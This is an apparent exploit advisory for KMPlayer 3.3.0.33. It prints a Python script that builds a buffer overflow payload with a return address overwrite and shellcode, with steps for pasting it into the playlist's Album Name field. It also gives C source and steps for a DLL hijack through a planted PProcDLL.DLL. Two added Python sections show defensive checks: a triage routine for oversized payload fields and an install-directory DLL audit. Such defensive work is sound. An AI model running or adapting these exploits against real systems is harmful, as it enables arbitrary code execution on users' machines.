KMPlayer Multiple Exploits

Summary

KMPlayer suffers from multiple vulnerabilities.

Credit:

The information has been provided by Mr.XHat.


Details

Vulnerable Systems:
 * KMPlayer v3.3.0.33

# Buffer Overflow Vulnerability:

# Byte literals and binary mode so the file holds the raw bytes under both Python 2 and 3.
junk = b'\x41' * 250                      # padding up to the saved return address
eip = b'\xD7\x30\x9D\x7C'                 # return address overwrite (value from the advisory)
shellcode = (
    b'\x31\xC9\x51\x68\x63\x61\x6C\x63'   # payload bytes from the advisory
    b'\x54\xB8\xC7\x93\xC2\x77\xFF\xD0'
)
exploit = junk + eip + shellcode
with open('Exploit.txt', 'wb') as f:
    f.write(exploit)

# How To Do Exploit:
# First run KMPlayer and go to Playlist > Playlist Editor… > Add New Album, then paste the exploit code into 'Album Name:'. The shellcode will now execute.
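A defender's counterpart to the payload above, added here as an example and not part of the original advisory: a triage routine that flags text fields carrying the shape of an overflow payload (far longer than any real album name, a long run of one padding byte, non-printable bytes where a title should be). The thresholds and the sample field values are constructed for this example; KMPlayer's real length limits are not documented on this page, and the sample uses opaque placeholder bytes rather than shellcode.

```python
import string

# Constructed thresholds for this example; a real deployment would tune them
# to the field being checked (KMPlayer's own limits are not documented here).
MAX_FIELD_LEN = 128      # longest album name worth accepting
MAX_RUN_LEN = 64         # longer runs of one byte look like overflow padding

# Printable ASCII only; space, tab and line breaks are tolerated, other control bytes are not.
PRINTABLE = set(string.printable.encode("ascii")) - {0x0B, 0x0C}


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def triage_field(data: bytes) -> list:
    """Return the reasons a field looks like an overflow payload; an empty list means clean."""
    reasons = []
    if len(data) > MAX_FIELD_LEN:
        reasons.append(f"length {len(data)} exceeds {MAX_FIELD_LEN}")
    run = longest_run(data)
    if run >= MAX_RUN_LEN:
        reasons.append(f"padding run of {run} identical bytes")
    non_printable = sum(1 for b in data if b not in PRINTABLE)
    if non_printable:
        reasons.append(f"{non_printable} non-printable bytes")
    return reasons


# Constructed sample with the shape of the advisory's payload: 250 bytes of padding,
# the 4-byte return address quoted above, then placeholder bytes standing in for shellcode.
SAMPLE_PAYLOAD = b"\x41" * 250 + b"\xD7\x30\x9D\x7C" + b"\x00\x01\x02\x03"
# Constructed benign album name for comparison.
SAMPLE_BENIGN = b"Greatest Hits (Remastered) - Disc 2"

if __name__ == "__main__":
    for label, field in (("payload", SAMPLE_PAYLOAD), ("benign", SAMPLE_BENIGN)):
        print(label, triage_field(field) or "clean")
```

The same three checks apply to any free-text field an application copies into a fixed-size buffer; the length bound is the one that matters for the vulnerability itself, the other two are what make a payload stand out from an unusually long but genuine title.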

# DLL Hijacking Vulnerability:

# DLL Name: PProcDLL.DLL

# How To Do Hijack:
First compile the source code below with a C compiler and rename the compiled DLL to PProcDLL.DLL, then copy it to the KMPlayer installation path. When KMPlayer is next run, the DLL will be hijacked.

#include <windows.h>

/* Proof-of-concept payload: shows a message box when the planted DLL is loaded. */
static int dll_hijack(void)
{
    MessageBox(0, "DLL Hijacked!", "Mr.XHat", MB_OK);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        dll_hijack();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
#
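Added example, not part of the advisory: an integrity audit of an application's install directory, which is where the hijack above plants its file. The audit compares every DLL present against a baseline of the modules the vendor actually ships, so a PProcDLL.DLL that KMPlayer never installed shows up as an unexpected module, and a shipped module with altered bytes shows up as modified. The directory contents, the baseline and the file bytes are constructed inside the example; on a real system the baseline would be taken from a known-good installation.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hex SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_install_dir(install_dir, baseline: dict) -> list:
    """Compare the DLLs in install_dir against a baseline of {lowercase name: sha256}.

    Windows resolves module names case-insensitively, so names are compared lowercased.
    Returns (finding, filename) pairs; findings are unexpected_dll, modified_dll, missing_dll.
    """
    install_dir = Path(install_dir)
    findings = []
    present = {}
    for p in sorted(install_dir.iterdir()):
        if p.is_file() and p.suffix.lower() == ".dll":
            present[p.name.lower()] = p
    for name, p in present.items():
        expected = baseline.get(name)
        if expected is None:
            findings.append(("unexpected_dll", p.name))
        elif expected != sha256_file(p):
            findings.append(("modified_dll", p.name))
    for name in baseline:
        if name not in present:
            findings.append(("missing_dll", name))
    return findings


def demo() -> list:
    """Run the audit against a constructed install directory (not a real KMPlayer install)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed vendor files; the baseline is recorded from the known-good copy.
        (root / "KMPlayer.exe").write_bytes(b"MZ constructed launcher")
        (root / "Vendor.dll").write_bytes(b"MZ constructed vendor module")
        baseline = {
            "vendor.dll": sha256_file(root / "Vendor.dll"),
            "shipped.dll": "0" * 64,   # constructed entry for a module that is absent
        }
        # A file with the hijacked name dropped into the install directory, as the advisory describes.
        (root / "PProcDLL.DLL").write_bytes(b"MZ constructed planted module")
        # A vendor module whose bytes no longer match the baseline.
        (root / "Vendor.dll").write_bytes(b"MZ constructed vendor module, altered")
        return audit_install_dir(root, baseline)


if __name__ == "__main__":
    for finding, name in demo():
        print(f"{finding:15} {name}")
```

The unexpected_dll finding is the one that corresponds to the hijack in this advisory: the application asks the loader for a module by bare name that it does not ship, so any file of that name in the search path is accepted. The missing_dll finding is there so the baseline itself stays honest about what the vendor installed.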

Disclosure Timeline:
Published: 2012-11-04

Categories: Exploits